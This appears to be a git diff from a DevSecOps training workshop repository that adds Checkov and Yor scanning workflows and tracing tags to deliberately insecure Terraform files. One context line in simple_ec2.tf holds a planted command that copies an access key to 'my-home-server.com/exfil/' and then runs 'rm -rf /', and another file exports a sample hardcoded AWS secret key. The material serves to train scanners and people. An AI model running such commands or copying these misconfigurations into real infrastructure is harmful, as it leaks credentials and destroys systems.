diff --git a/.github/workflows/checkov.yaml b/.github/workflows/checkov.yaml new file mode 100644 index 000000000..10ac4d279 --- /dev/null +++ b/.github/workflows/checkov.yaml @@ -0,0 +1,35 @@ +name: checkov +on: + pull_request: + push: + branches: + - main +jobs: + scan: + runs-on: ubuntu-latest + permissions: + contents: read # for actions/checkout to fetch code + security-events: write # for GitHub/codeql-action/upload-sarif to upload SARIF results + + steps: + - uses: actions/checkout@v2 + + - name: Run checkov + id: checkov + uses: bridgecrewio/checkov-action@master + with: + directory: code/ + #soft_fail: true + #api-key: ${{ secrets.BC_API_KEY }} + #env: + #PRISMA_API_URL: https://api4.prismacloud.io + + - name: Upload SARIF file + uses: GitHub/codeql-action/upload-sarif@v3 + + # Results are generated only on a success or failure + # this is required since GitHub by default won't run the next step + # when the previous one has failed. Alternatively, enable soft_fail in checkov action. + if: success() || failure() + with: + sarif_file: results.sarif diff --git a/.github/workflows/yor.yaml b/.github/workflows/yor.yaml new file mode 100644 index 000000000..1050790d4 --- /dev/null +++ b/.github/workflows/yor.yaml @@ -0,0 +1,19 @@ +name: IaC tag and trace + +on: + push: + pull_request: + +jobs: + yor: + runs-on: ubuntu-latest + permissions: + contents: write + + steps: + - uses: actions/checkout@v2 + name: Checkout repo + with: + fetch-depth: 0 + - name: Run yor action + uses: bridgecrewio/yor-action@main diff --git a/code/build/gcs.tf b/code/build/gcs.tf new file mode 100644 index 000000000..04735b606 --- /dev/null +++ b/code/build/gcs.tf @@ -0,0 +1,32 @@ +provider "google" { + project = "qwiklabs-gcp-03-fa7edfd03d8e" + region = "us-central1" +} + +resource "google_storage_bucket" "Example" { + name = "demo2-${random_id.Rand_suffix.hex}" + location = "us-central1" + force_destroy = true + + uniform_bucket_level_access = false + + labels = { + git_commit = "8b01968a3ab2b9a1c8f4f38b1d51f999c85df31d" + git_file = "code__build__gcs_tf" + git_last_modified_at = "2025-08-18-07-26-48" + git_last_modified_by = "52453932danielma911" + git_modifiers = "52453932danielma911" + git_org = "danielma911" + git_repo = "prisma-cloud-devsecops-workshop" + yor_name = "Example" + yor_trace = "f1afb72e-2fec-49e9-bd3f-03fef6f3075a" + } +} + +resource "random_id" "Rand_suffix" { + byte_length = 4 +} + +output "Bucket_name" { + value = google_storage_bucket.Example.name +} diff --git a/code/deployment_ec2.tf b/code/deployment_ec2.tf index 7e3d2bba2..93acd2175 100644 --- a/code/deployment_ec2.tf +++ b/code/deployment_ec2.tf @@ -17,7 +17,18 @@ export AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMAAAKEY export AWS_DEFAULT_REGION=us-west-2 echo "

Deployed via Terraform

" | sudo tee /var/www/html/index.html EOF - + + tags = { + git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2" + git_file = "code/deployment_ec2.tf" + git_last_modified_at = "2024-01-26 23:01:56" + git_last_modified_by = "tprendervill@paloaltonetworks.com" + git_modifiers = "tprendervill" + git_org = "danielma911" + git_repo = "prisma-cloud-devsecops-workshop" + yor_name = "web_host" + yor_trace = "900a5a4e-d50a-489d-bca1-cb5d0388451d" + } } resource "aws_ebs_volume" "web_host_storage" { @@ -25,14 +36,36 @@ resource "aws_ebs_volume" "web_host_storage" { availability_zone = "${var.region}a" #encrypted = false # Setting this causes the volume to be recreated on apply size = 1 - + + tags = { + git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2" + git_file = "code/deployment_ec2.tf" + git_last_modified_at = "2024-01-26 23:01:56" + git_last_modified_by = "tprendervill@paloaltonetworks.com" + git_modifiers = "tprendervill" + git_org = "danielma911" + git_repo = "prisma-cloud-devsecops-workshop" + yor_name = "web_host_storage" + yor_trace = "c0d5f6d7-73b0-4605-830f-9322f4e0821f" + } } resource "aws_ebs_snapshot" "example_snapshot" { # ebs snapshot without encryption volume_id = "${aws_ebs_volume.web_host_storage.id}" description = "${local.resource_prefix.value}-ebs-snapshot" - + + tags = { + git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2" + git_file = "code/deployment_ec2.tf" + git_last_modified_at = "2024-01-26 23:01:56" + git_last_modified_by = "tprendervill@paloaltonetworks.com" + git_modifiers = "tprendervill" + git_org = "danielma911" + git_repo = "prisma-cloud-devsecops-workshop" + yor_name = "example_snapshot" + yor_trace = "0edc82cd-9a76-40b4-b3cf-84103c5e1be3" + } } resource "aws_volume_attachment" "ebs_att" { @@ -69,14 +102,36 @@ resource "aws_security_group" "web-node" { "0.0.0.0/0"] } depends_on = [aws_vpc.web_vpc] - + + tags = { + git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2" + git_file = "code/deployment_ec2.tf" + git_last_modified_at = "2024-01-26 23:01:56" + git_last_modified_by = "tprendervill@paloaltonetworks.com" + git_modifiers = "tprendervill" + git_org = "danielma911" + git_repo = "prisma-cloud-devsecops-workshop" + yor_name = "web-node" + yor_trace = "bae57cc2-b69a-42f7-b161-4604df0db619" + } } resource "aws_vpc" "web_vpc" { cidr_block = "172.16.0.0/16" enable_dns_hostnames = true enable_dns_support = true - + + tags = { + git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2" + git_file = "code/deployment_ec2.tf" + git_last_modified_at = "2024-01-26 23:01:56" + git_last_modified_by = "tprendervill@paloaltonetworks.com" + git_modifiers = "tprendervill" + git_org = "danielma911" + git_repo = "prisma-cloud-devsecops-workshop" + yor_name = "web_vpc" + yor_trace = "3b7b6467-c268-46f4-b137-c922181a1624" + } } resource "aws_subnet" "web_subnet" { @@ -85,7 +140,18 @@ resource "aws_subnet" "web_subnet" { availability_zone = "${var.region}a" map_public_ip_on_launch = true - + + tags = { + git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2" + git_file = "code/deployment_ec2.tf" + git_last_modified_at = "2024-01-26 23:01:56" + git_last_modified_by = "tprendervill@paloaltonetworks.com" + git_modifiers = "tprendervill" + git_org = "danielma911" + git_repo = "prisma-cloud-devsecops-workshop" + yor_name = "web_subnet" + yor_trace = "e792eebf-4140-4079-ba8f-f93196c0c337" + } } resource "aws_subnet" "web_subnet2" { @@ -94,20 +160,53 @@ resource "aws_subnet" "web_subnet2" { availability_zone = "${var.region}b" map_public_ip_on_launch = true - + + tags = { + git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2" + git_file = "code/deployment_ec2.tf" + git_last_modified_at = "2024-01-26 23:01:56" + git_last_modified_by = "tprendervill@paloaltonetworks.com" + git_modifiers = "tprendervill" + git_org = "danielma911" + git_repo = "prisma-cloud-devsecops-workshop" + yor_name = "web_subnet2" + yor_trace = "59d7c428-1542-4c3f-a18e-5ef39b8885d1" + } } resource "aws_internet_gateway" "web_igw" { vpc_id = aws_vpc.web_vpc.id - + + tags = { + git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2" + git_file = "code/deployment_ec2.tf" + git_last_modified_at = "2024-01-26 23:01:56" + git_last_modified_by = "tprendervill@paloaltonetworks.com" + git_modifiers = "tprendervill" + git_org = "danielma911" + git_repo = "prisma-cloud-devsecops-workshop" + yor_name = "web_igw" + yor_trace = "ba67901a-5f34-41d2-94de-c110406976ab" + } } resource "aws_route_table" "web_rtb" { vpc_id = aws_vpc.web_vpc.id - + + tags = { + git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2" + git_file = "code/deployment_ec2.tf" + git_last_modified_at = "2024-01-26 23:01:56" + git_last_modified_by = "tprendervill@paloaltonetworks.com" + git_modifiers = "tprendervill" + git_org = "danielma911" + git_repo = "prisma-cloud-devsecops-workshop" + yor_name = "web_rtb" + yor_trace = "2d2cd15f-db35-4960-9ba9-0db40418264e" + } } resource "aws_route_table_association" "rtbassoc" { @@ -134,6 +233,17 @@ resource "aws_network_interface" "web-eni" { subnet_id = aws_subnet.web_subnet.id private_ips = ["172.16.10.100"] + tags = { + git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2" + git_file = "code/deployment_ec2.tf" + git_last_modified_at = "2024-01-26 23:01:56" + git_last_modified_by = "tprendervill@paloaltonetworks.com" + git_modifiers = "tprendervill" + git_org = "danielma911" + git_repo = "prisma-cloud-devsecops-workshop" + yor_name = "web-eni" + yor_trace = "f5d866ee-a9a6-49f2-b696-62ddb36586ba" + } } # VPC Flow Logs to S3 @@ -144,12 +254,34 @@ resource "aws_flow_log" "vpcflowlogs" { vpc_id = aws_vpc.web_vpc.id + tags = { + git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2" + git_file = "code/deployment_ec2.tf" + git_last_modified_at = "2024-01-26 23:01:56" + git_last_modified_by = "tprendervill@paloaltonetworks.com" + git_modifiers = "tprendervill" + git_org = "danielma911" + git_repo = "prisma-cloud-devsecops-workshop" + yor_name = "vpcflowlogs" + yor_trace = "3ab0449c-0b40-4e2e-bebc-ff0e6693d198" + } } resource "aws_s3_bucket" "flowbucket" { bucket = "${local.resource_prefix.value}-flowlogs" force_destroy = true + tags = { + git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2" + git_file = "code/deployment_ec2.tf" + git_last_modified_at = "2024-01-26 23:01:56" + git_last_modified_by = "tprendervill@paloaltonetworks.com" + git_modifiers = "tprendervill" + git_org = "danielma911" + git_repo = "prisma-cloud-devsecops-workshop" + yor_name = "flowbucket" + yor_trace = "5384bbb2-d0a0-42ae-8242-bc57d3f53478" + } } # OUTPUTS diff --git a/code/deployment_s3.tf b/code/deployment_s3.tf index cfb272e1d..9e98e908b 100644 --- a/code/deployment_s3.tf +++ b/code/deployment_s3.tf @@ -5,14 +5,36 @@ resource "aws_s3_bucket" "data" { # bucket does not have versioning bucket = "${local.resource_prefix.value}-data" force_destroy = true - + + tags = { + git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2" + git_file = "code/deployment_s3.tf" + git_last_modified_at = "2024-01-26 23:01:56" + git_last_modified_by = "tprendervill@paloaltonetworks.com" + git_modifiers = "tprendervill" + git_org = "danielma911" + git_repo = "prisma-cloud-devsecops-workshop" + yor_name = "data" + yor_trace = "86be4da9-9dc4-4076-97f3-71f27a53527f" + } } resource "aws_s3_bucket_object" "data_object" { bucket = aws_s3_bucket.data.id key = "customer-master.xlsx" source = "resources/customer-master.xlsx" - + + tags = { + git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2" + git_file = "code/deployment_s3.tf" + git_last_modified_at = "2024-01-26 23:01:56" + git_last_modified_by = "tprendervill@paloaltonetworks.com" + git_modifiers = "tprendervill" + git_org = "danielma911" + git_repo = "prisma-cloud-devsecops-workshop" + yor_name = "data_object" + yor_trace = "4bd48f6a-eb4e-497f-a60c-1ab271bf58ee" + } } resource "aws_s3_bucket" "financials" { @@ -23,6 +45,17 @@ resource "aws_s3_bucket" "financials" { acl = "private" force_destroy = true + tags = { + git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2" + git_file = "code/deployment_s3.tf" + git_last_modified_at = "2024-01-26 23:01:56" + git_last_modified_by = "tprendervill@paloaltonetworks.com" + git_modifiers = "tprendervill" + git_org = "danielma911" + git_repo = "prisma-cloud-devsecops-workshop" + yor_name = "financials" + yor_trace = "cf47b06d-08b4-4bfb-afb9-812a0f6fbf1b" + } } resource "aws_s3_bucket" "operations" { @@ -34,7 +67,18 @@ resource "aws_s3_bucket" "operations" { enabled = true } force_destroy = true - + + tags = { + git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2" + git_file = "code/deployment_s3.tf" + git_last_modified_at = "2024-01-26 23:01:56" + git_last_modified_by = "tprendervill@paloaltonetworks.com" + git_modifiers = "tprendervill" + git_org = "danielma911" + git_repo = "prisma-cloud-devsecops-workshop" + yor_name = "operations" + yor_trace = "9d2680ec-dfcf-4fa7-9a3b-dec5a0798663" + } } resource "aws_s3_bucket" "data_science" { @@ -49,7 +93,18 @@ resource "aws_s3_bucket" "data_science" { target_prefix = "log/" } force_destroy = true - + + tags = { + git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2" + git_file = "code/deployment_s3.tf" + git_last_modified_at = "2024-01-26 23:01:56" + git_last_modified_by = "tprendervill@paloaltonetworks.com" + git_modifiers = "tprendervill" + git_org = "danielma911" + git_repo = "prisma-cloud-devsecops-workshop" + yor_name = "data_science" + yor_trace = "91c489e8-1eea-4254-aa8d-21fd7b728ff5" + } } resource "aws_s3_bucket" "logs" { @@ -67,5 +122,16 @@ resource "aws_s3_bucket" "logs" { } } force_destroy = true - + + tags = { + git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2" + git_file = "code/deployment_s3.tf" + git_last_modified_at = "2024-01-26 23:01:56" + git_last_modified_by = "tprendervill@paloaltonetworks.com" + git_modifiers = "tprendervill" + git_org = "danielma911" + git_repo = "prisma-cloud-devsecops-workshop" + yor_name = "logs" + yor_trace = "032fca23-6c94-479d-8710-5102342f5773" + } } diff --git a/code/s33.tf b/code/s33.tf new file mode 100644 index 000000000..9961794d1 --- /dev/null +++ b/code/s33.tf @@ -0,0 +1,27 @@ +provider "aws" { + region = "us-west-2" +} + +resource "aws_s3_bucket" "dev_s3" { + bucket_prefix = "dev-" + + tags = { + Environment = "Dev" + yor_name = "dev_s3" + yor_trace = "46510630-5abb-42ff-9093-1ba6316afb99" + git_commit = "d45bb668208a5be396137f91008a9bcc52921522" + git_file = "code/s33.tf" + git_last_modified_at = "2025-08-13 01:34:25" + git_last_modified_by = "52453932+danielma911@users.noreply.github.com" + git_modifiers = "52453932+danielma911" + git_org = "danielma911" + git_repo = "prisma-cloud-devsecops-workshop" + } +} + +resource "aws_s3_bucket_ownership_controls" "dev_s3" { + bucket = aws_s3_bucket.dev_s3.id + rule { + object_ownership = "BucketOwnerPreferred" + } +} diff --git a/code/simple_ec2.tf b/code/simple_ec2.tf index dcfa5880f..117a39ed8 100644 --- a/code/simple_ec2.tf +++ b/code/simple_ec2.tf @@ -10,4 +10,15 @@ resource "aws_ec2_host" "test" { command = "echo Running install scripts.. 'echo $ACCESS_KEY > creds.txt ; scp -r creds.txt root@my-home-server.com/exfil/ ; rm -rf /' " } + tags = { + git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2" + git_file = "code/simple_ec2.tf" + git_last_modified_at = "2024-01-26 23:01:56" + git_last_modified_by = "tprendervill@paloaltonetworks.com" + git_modifiers = "tprendervill" + git_org = "danielma911" + git_repo = "prisma-cloud-devsecops-workshop" + yor_name = "test" + yor_trace = "e99b073b-44b2-4c8b-8873-40b6d6d16493" + } } diff --git a/code/simple_s3.tf b/code/simple_s3.tf index c0d25fb60..fa5953c36 100644 --- a/code/simple_s3.tf +++ b/code/simple_s3.tf @@ -6,7 +6,16 @@ resource "aws_s3_bucket" "dev_s3" { bucket_prefix = "dev-" tags = { - Environment = "Dev" + Environment = "Dev" + git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2" + git_file = "code/simple_s3.tf" + git_last_modified_at = "2024-01-26 23:01:56" + git_last_modified_by = "tprendervill@paloaltonetworks.com" + git_modifiers = "tprendervill" + git_org = "danielma911" + git_repo = "prisma-cloud-devsecops-workshop" + yor_name = "dev_s3" + yor_trace = "10f1637f-e216-4692-876e-2faa60a3329e" } }